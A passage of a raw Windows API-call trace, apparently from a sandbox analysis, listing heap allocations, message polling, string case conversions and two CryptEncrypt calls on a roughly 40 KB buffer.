hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7100 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0090.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0090.251] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78368 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0090.251] CharUpperBuffW (in: lpsz="A5C00800A45", cchLength=0xb | out: lpsz="A5C00800A45") returned 0xb [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78368 | out: hHeap=0x2af0000) returned 1 [0090.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0090.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a74088 [0090.251] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a781b0 [0090.252] CharUpperBuffW (in: lpsz="SSA5C00800A45", cchLength=0xd | out: lpsz="SSA5C00800A45") returned 0xd [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a781b0 | out: hHeap=0x2af0000) returned 1 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ec40 [0090.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ec40 | out: hHeap=0x2af0000) returned 1 [0090.252] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d00 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ab8 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d48 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.253] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74088 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9af0 | out: hHeap=0x2af0000) returned 1 [0090.253] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5eb40 [0090.253] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0090.253] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0090.253] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e6c0 [0090.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0090.254] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71aa8 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0090.254] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78458 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0090.254] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.254] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a98 | out: hHeap=0x2af0000) returned 1 [0090.254] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78110 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719b8 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.254] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.254] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ed00 | out: hHeap=0x2af0000) returned 1 [0090.255] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c40 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71aa8 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ec8 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d90 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a28 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d78 | out: hHeap=0x2af0000) returned 1 [0090.255] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c88 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e50 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ee0 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b88 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a97e48 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b48 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e80 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ad8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719a8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5de88 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b18 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ca0 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a18 | out: hHeap=0x2af0000) returned 1 [0090.256] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cb8 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.256] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a38 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b28 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71af8 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ce8 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9dd8 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a719f8 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9f10 | out: hHeap=0x2af0000) returned 1 [0090.257] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71ac8 | out: hHeap=0x2af0000) returned 1 [0090.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.257] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9d60, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.257] CryptEncrypt (in: hKey=0x9a3bc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0x9efc, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0x9f00) returned 1 [0090.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.257] CharLowerBuffW (in: lpsz="byte[40704]", cchLength=0xb | out: lpsz="byte[40704]") returned 0xb [0090.257] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.259] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.259] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0090.259] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.259] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0090.259] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.259] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0090.259] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0090.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0090.259] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aa9ef8, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0090.259] CryptEncrypt (in: hKey=0x9a3bc0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2a97e48*, pdwDataLen=0x8cef60*=0x9efc, dwBufLen=0x9f00 | out: pbData=0x2a97e48*, pdwDataLen=0x8cef60*=0x9f00) returned 1 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0090.261] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0090.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.261] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0090.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.261] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0090.261] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0090.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0090.261] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0090.261] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, 